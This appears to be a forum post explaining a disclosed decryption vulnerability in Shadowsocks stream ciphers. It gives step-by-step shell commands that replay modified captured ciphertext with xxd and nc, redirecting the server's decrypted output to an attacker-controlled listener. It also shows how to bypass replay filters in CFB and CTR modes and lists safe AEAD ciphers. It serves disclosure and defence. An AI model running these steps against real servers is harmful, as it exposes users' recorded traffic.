Decryption vulnerability in Shadowsocks stream ciphers

Zhiniang Peng (@edwardz246003) of Qihoo 360 Core Security has discovered and disclosed a devastating vulnerability in Shadowsocks stream ciphers. Under modest assumptions, an attacker can get full decryption of recorded Shadowsocks sessions, without knowing the password.

Redirect attack on Shadowsocks stream ciphers (PDF) (archive) Home page with Python proof of concept (archive)

This post is my attempt to explain the vulnerability as I understand it.

The attack works by using the Shadowsocks server as a decryption oracle, causing it to decrypt a previously recorded encrypted stream and send the plaintext to a target controlled by the attacker. The attack is possible under the following conditions:

The Shadowsocks server must be configured to use one of the stream ciphers. The attack relies on modifying recorded ciphertexts, so it does not work with AEAD ciphers.
The attacker must be in a position to record an encrypted Shadowsocks connection; i.e., must be on the network path between the Shadowsocks client and the Shadowsocks server.
The Shadowsocks server must still be running, with the same password.
The attacker must be able to guess the first 7 bytes of the plaintext.

The attacker does not need to know the Shadowsocks password. The attacker relies on the fact that the Shadowsocks server does know the password, and tricks the server into decrypting a message and sending it where the attacker can read it.

How Shadowsocks stream ciphers work

The client and server derive a shared symmetric encryption key from a password. The key never changes: it is the same for every connection and in both directions.

The client sends to the server a random initialization vector (IV), an encrypted target specification, and an encrypted payload that the server should decrypt and send to the target.

[          client IV           ][   target   ][ upstream payload ...

The server decrypts the target specification using the client's IV and the shared key. If the target specification is syntactically valid, the server connects to the target, then starts decrypting the client's payload and forwarding the plaintext to the target. Whatever the target sends back, the server encrypts and sends back to the client, under a separate random IV.

[          server IV           ][ downstream payload ...

A target specification is 7 bytes long. The first byte is the static value 1; the next 4 bytes are an IPv4 address; and the last 2 bytes are a port number. (For simplicity, we will only look at IPv4 targets. Actually there are two other target specification formats: type 4 is an IPv6 address (19 bytes total) and type 3 is a hostname (variable length).)

|type|    IPv4 address   |   port  |
+----+----+----+----+----+----+----+
|  1 |      A.B.C.D      |   XXYY  |
+----+----+----+----+----+----+----+

Stream ciphers have no integrity checks. Whatever you send to the server, it will decrypt, and if the first 7 bytes after the IV happen to decrypt to a valid target specification, the server will connect to that target and send it the decryption of the rest of the stream. This means, for example, that if you connect to a Shadowsocks server and just send it random bytes, with probability 1/256 the first byte will decrypt to a 1, which is all that is required for a target specification to be syntactically valid. When that happens, the Shadowsocks will decrypt the rest of the stream and send the plaintext... somewhere. Where? To whatever random IPv4 address and port the other 6 bytes of the target specification happen to decrypt to.

Stream ciphers are also malleable. This means that if you XOR a value into the ciphertext, that same value will be XORed into the plaintext after decryption.

Attack walkthrough

I'll walk through the process of decrypting a recorded stream in the server→client direction. That direction is easier because it's easier to guess the first 7 bytes of the plaintext.

Let's set up a local Shadowsocks server and client using the Python implementation.

shadowsocks/server.py -s 127.0.0.1 -p 8388 -k password -m aes-256-cfb
shadowsocks/local.py -s 127.0.0.1 -p 8388 -k password -m aes-256-cfb -l 1080

Now start capturing traffic and request a web page through the Shadowsocks client.

tcpdump -i lo -U -w shadowsocks.pcap port 8388
curl -4 -x socks5://127.0.0.1:1080/ http://example.com/

From the traffic capture we get the encrypted server→client stream:

d57aa290e7d6ac989897c15acfab0e897c20f534e986dbce37f555c6760ea24f
aa928f760db22438c8963c57e83b36fec4933f3785e2c37cd4fb25e0a4047c08
84742bcb00f19493a6ea4d5c0874f7f869b31052a9d058c5427e7ccec47b568f
4c131915550b0c5e1ccafc99f0a77923e2af4ad2606ad9876ecae789b61ea225
...

What happens if we replay this ciphertext to the server with no changes? (Note, this is an unusual type of replay attack: we are sending the server's own output back to it. Remember, the encryption key in both directions is the same. The xxd -r -p command converts hex to binary.)

echo d57aa290e7d6ac989897c15acfab0e897c20f534e986dbce37f555c6760ea24f \
     aa928f760db22438c8963c57e83b36fec4933f3785e2c37cd4fb25e0a4047c08 \
     84742bcb00f19493a6ea4d5c0874f7f869b31052a9d058c5427e7ccec47b568f \
     4c131915550b0c5e1ccafc99f0a77923e2af4ad2606ad9876ecae789b61ea225 \
| xxd -r -p | nc 127.0.0.1 8388

The connection fails and the server outputs an error, unsupported addrtype 72:

WARNING  unsupported addrtype 72, maybe wrong password or encryption method
ERROR    can not parse header

What is addrtype 72? 72 is the ASCII code for H. The server has decrypted the ciphertext—getting a plaintext that starts with HTTP/1.1 200 OK—and interpreted the first 7 bytes, HTTP/1., as a target specification. But the first byte of a target specification is supposed to be 1, not 72. Therefore the target specification is not valid and the server rejects the connection.

What if we modify the 17th byte? That the first byte after the IV, corresponding to the type field of the target specification. Its original value is 0x7c, which we know decrypts to 72. The stream cipher is malleable, so anything we XOR into the ciphertext will also be XORed into the plaintext. If we XOR 0x7c with 72, then instead of decrypting to 72, it should decrypt to 0. Try changing the 17th byte from 0x7c to 0x34 (which is 0x7c XOR 72):

                                     ↓↓
echo d57aa290e7d6ac989897c15acfab0e893420f534e986db \
| xxd -r -p | nc 127.0.0.1 8388

The server decrypts an addrtype 0, as expected.

WARNING  unsupported addrtype 0, maybe wrong password or encryption method
ERROR    can not parse header

Now what if we additionally XOR in a value of 1, so that the byte decrypts to 1? 0x34 XOR 1 = 0x35.

                                     ↓↓
echo d57aa290e7d6ac989897c15acfab0e893520f534e986db \
| xxd -r -p | nc 127.0.0.1 8388

Now the server gets an addrtype 1, so it thinks it has an IPv4 address specification. The server tries to make a connection to... somewhere.

INFO     connecting 84.84.80.47:12590

What is the address 84.84.80.47:12590? It's just the 6 bytes TTP/1., interpreted as an IPv4 address and port: 84 = T, 84 = T, 80 = P, 47 = /, etc. The Shadowsocks server has connected to some target and sent it the decryption of a previously recorded encrypted stream.

We exploited ciphertext malleability to cause the first byte of the target specification to decrypt to 1. We can do the same thing with the other 6 bytes to make them decrypt to the address of a target we control. Let's say our address is 203.0.113.5:8000. We take the 6 bytes of the ciphertext that represent the address:

20f534e986db

and XOR them with TTP/1. (= 5454502f312e):

20f534e986db XOR 5454502f312e = 74a164c6b7f5

(If the server were to decrypt 74a164c6b7f5, it would decrypt to 000000000000.) We take that result and additionally XOR it with the bytes of our address (203.0.113.5:8000 = cb0071051f40):

74a164c6b7f5 XOR cb0071051f40 = bfa115c3a8b5

Replace those 6 bytes in the ciphertext, along with the type byte we already changed, then append the rest of the ciphertext. The sleep 1 is to force nc to send the target specification and payload in separate packets, which is a requirement of server.py.

                                      ↓↓↓↓↓↓↓↓↓↓↓↓↓↓
(echo d57aa290e7d6ac989897c15acfab0e8935bfa115c3a8b5 \
 | xxd -r -p; \
 sleep 1; \
 echo ce37f555c6760ea24faa928f760db22438c8963c57e83b36fec4933f3785e2c3 \
      7cd4fb25e0a4047c0884742bcb00f19493a6ea4d5c0874f7f869b31052a9d058 \
      c5427e7ccec47b568f4c131915550b0c5e1ccafc99f0a77923e2af4ad2606ad9 \
 | xxd -r -p) | nc 127.0.0.1 8388

The server output shows that the address was successfully changed:

INFO     connecting 203.0.113.5:8000

We can run a listener at 203.0.113.5:8000 to receive the decryption. The HTTP/1. is missing, because that part was interpreted as a target specification. After the 1 200 OK\r, one block (16 bytes) is garbage, because of how CFB mode works. But everything after that is pristine plaintext. In CTR mode there is no garbage block.

nc -l 8000 | xxd
00000000: 3120 3230 3020 4f4b 0df5 0baf c709 8c8d  1 200 OK........
00000010: ed6e 360e 19da ce80 1b62 7974 6573 0d0a  .n6......bytes..
00000020: 4167 653a 2034 3134 3631 310d 0a43 6163  Age: 414611..Cac
00000030: 6865 2d43 6f6e 7472 6f6c 3a20 6d61 782d  he-Control: max-
00000040: 6167 653d 3630 3438 3030 0d0a 436f 6e74  age=604800..Cont
00000050: 656e 742d 5479 7065 3a20 7465 7874 2f68  ent-Type: text/h

To recap: the attacker has an encrypted stream but doesn't know the key. The Shadowsocks server does know the key, and is willing to decrypt whatever you send it and send the plaintext somewhere. By modifying the first 7 bytes of the ciphertext, the attacker can control that somewhere and make it point to a target under its own control. The modification the attacker needs to do is ciphertext XOR plaintext XOR attacker's address.

Decrypting the client→server direction

The server→client direction is relatively easy to attack, because many common server protocols start with the same bytes (e.g. HTTP/1. for HTTP), or have only a small number of bytes that need to be brute-forced (e.g. \x16\x03???\x02\x00 for TLS).

In the client→server direction, the attacker again has to guess the first 7 bytes of the plaintext. The first 7 bytes sent by the client will always be part of a target specification. One option is to first decrypt the server→client direction, and use that information to infer what the original target was. For example, if the contents of the response indicate that the target was example.com, the attacker can see that example.com is at the address 93.184.216.34:80 and guess 015db8d8220050 for the plaintext using an IPv4 target specification, or guess 030b6578616d70 (\x03\x0bexamp) using a hostname target specification.

If the server happens to use a CFB mode stream cipher, it is even easier. The attacker can send the modified replay of the server→client stream as before, then simply append the client→server stream. Because of CFB's self-synchronizing behavior, the Shadowsocks server will start to output the plaintext of the client→server stream, after one block of garbage.

Mitigation

The attack only works against Shadowsocks stream ciphers, not AEAD ciphers. AEAD ciphers have integrity protection, so an attacker cannot modify and replay ciphertexts.

Stream ciphers (BAD): aes-128-ctr, aes-192-ctr, aes-256-ctr, aes-128-cfb, aes-192-cfb, aes-256-cfb, camellia-128-cfb, camellia-192-cfb, camellia-256-cfb, chacha20-ietf, bf-cfb, chacha20, salsa20, rc4-md5
AEAD ciphers (OK): chacha20-ietf-poly1305, aes-256-gcm, aes-192-gcm, aes-128-gcm

Some implementation of Shadowsocks, like shadowsocks-libev, have a replay filter that prohibits initialization vectors that have already been used. The filter in shadowsocks-libev even remembers IVs that the server itself sends. At first, it appears that a replay filter prevents the decryption attack, but it does not.

In the attack as described, the attacker observes a sequence of 16-byte blocks:

IV, C₁, C₂, C₃, C₄, ...

The attacker guesses the first 7 bytes of C₁, and XORs its own target address into it to produce C₁′. The attacker sends to the server:

IV, C₁′, C₂, C₃, C₄, ...

A server with a replay filter would reject the connection because IV is reused. If you try the attack as described shadowsocks-libev, the server will reject the connection and write an error message to the log:

ERROR: crypto: stream: repeat IV detected

But it's possible to adapt the attack to make it work even in the presence of a replay filter. Exactly how depends on what cipher is used.

CFB mode

In CFB mode, instead of guessing the first 7 bytes of C₁ to produce C₁′, the attacker can guess the first 7 bytes of C₂ to produce C₂′, and send C₁ in place of the IV. I.e., the attacker observes

IV, C₁, C₂, C₃, C₄, ...

and then sends

C₁, C₂′, C₃, C₄, ...

The server interprets C₁ as the IV, sees that it has not been used for an IV before, and so allows the connection.

As proof of the idea, let's revisit the example from the first comment, which uses the cipher aes-256-cfb, with shadowsocks-libev.

ss-server -s 127.0.0.1 -p 8388 -k password -m aes-256-cfb
ss-local -s 127.0.0.1 -p 8388 -k password -m aes-256-cfb -l 1080
curl -4 -x socks5://127.0.0.1:1080/ http://example.com/

The ciphertext blocks, along with their plaintexts, are:

IV = d57aa290e7d6ac989897c15acfab0e89
C₁ = 7c20f534e986dbce37f555c6760ea24f  "HTTP/1.1 200 OK\r"
C₂ = aa928f760db22438c8963c57e83b36fe  "\nAccept-Ranges: "
C₃ = c4933f3785e2c37cd4fb25e0a4047c08  "bytes\r\nAge: 4146"
C₄ = 84742bcb00f19493a6ea4d5c0874f7f8  "11\r\nCache-Contro"

Take the first 7 bytes of C₂ (aa928f760db224), XOR them with a guess for the plaintext (\nAccept = 0a416363657074), and XOR that with the attacker's target specification (IPv4 203.0.113.5:8000 = 01cb0071051f40). The XOR of all these is a118ec646ddd10, so the new C₂′ is a118ec646ddd1038c8963c57e83b36fe. Now remove IV and send C₁, C₂′, C₃, C₄, ... to the server:

                                       ↓↓↓↓↓↓↓↓↓↓↓↓↓↓
(echo 7c20f534e986dbce37f555c6760ea24f a118ec646ddd10 \
 | xxd -r -p; \
 sleep 1; \
 echo 38c8963c57e83b36fe \
      c4933f3785e2c37cd4fb25e0a4047c08 84742bcb00f19493a6ea4d5c0874f7f8 \
 | xxd -r -p) | nc 127.0.0.1 8388

The attacker's listener gets the last 9 bytes of the plaintext of C₂, then a block of garbage, then the plaintext of block C₄ and all later blocks.

nc -l 8000 | xxd
00000000: 2d52 616e 6765 733a 20b7 1d8b a81a 3ac8  -Ranges: .....:.
00000010: 326f cdaf cc00 c1b0 4b31 310d 0a43 6163  2o......K11..Cac

If you need to get all the plaintext, including the early blocks, you can take advantage of the self-synchronizing property of CFB and do something like:

C₁, C₂′, IV, C₁, C₂, C₃, C₄, ...

CTR mode

In CTR mode, the attacker similarly guesses the first 7 bytes of C₂ instead of C₁, removes C₁ from the sequence, and increments the original IV by 1. I.e., the attacker observes

IV, C₁, C₂, C₃, C₄, ...

and then sends

IV+1, C₂′, C₃, C₄, ...

The server sees that IV+1 has not been used before, and allows the connection.

Let's get a new traffic capture with shadowsocks-libev using the aes-256-ctr cipher.

ss-server -s 127.0.0.1 -p 8388 -k password -m aes-256-ctr
ss-local -s 127.0.0.1 -p 8388 -k password -m aes-256-ctr -l 1080
curl -4 -x socks5://127.0.0.1:1080/ http://example.com/

The ciphertext blocks and their corresponding plaintexts are:

IV = 78a5f49ff7ad611765bf232574566591
C₁ = 7dc2dcb7cdcdb2816e91681f37062483  "HTTP/1.1 200 OK\r"
C₂ = c35ad20be2c3e9e6ff9a99721071a3f9  "\nAccept-Ranges: "
C₃ = 6b03ae4e042deaa570534209b1b2d62c  "bytes\r\nAge: 4683"
C₄ = 445ed56831c4cb1348accbea14ddfde2  "74\r\nCache-Contro"

Exactly as in the CFB case, take the first 7 bytes of C₂ (c35ad20be2c3e9), XOR them with a guess for the plaintext (\nAccept = 0a416363657074), and XOR that with the attacker's target specification (IPv4 203.0.113.5:8000 = 01cb0071051f40). The XOR of all these is c8d0b11982acdd, so the new C₂′ is c8d0b11982acdde6ff9a99721071a3f9. Now send IV+1, C₂′, C₃, C₄, ... to the server:

                                    ↓↓ ↓↓↓↓↓↓↓↓↓↓↓↓↓↓
(echo 78a5f49ff7ad611765bf232574566592 c8d0b11982acdd \
 | xxd -r -p; \
 sleep 1; \
 echo e6ff9a99721071a3f9 \
      6b03ae4e042deaa570534209b1b2d62c 445ed56831c4cb1348accbea14ddfde2 \
 | xxd -r -p) | nc 127.0.0.1 8388

The attacker's listener gets all the plaintext starting with the last 9 bytes of C₂. I don't know how to adapt this technique to get the plaintext of C₁.

nc -l 8000 | xxd
00000000: 2d52 616e 6765 733a 2062 7974 6573 0d0a  -Ranges: bytes..
00000010: 4167 653a 2034 3638 3337 340d 0a43 6163  Age: 468374..Cac

net4people / bbs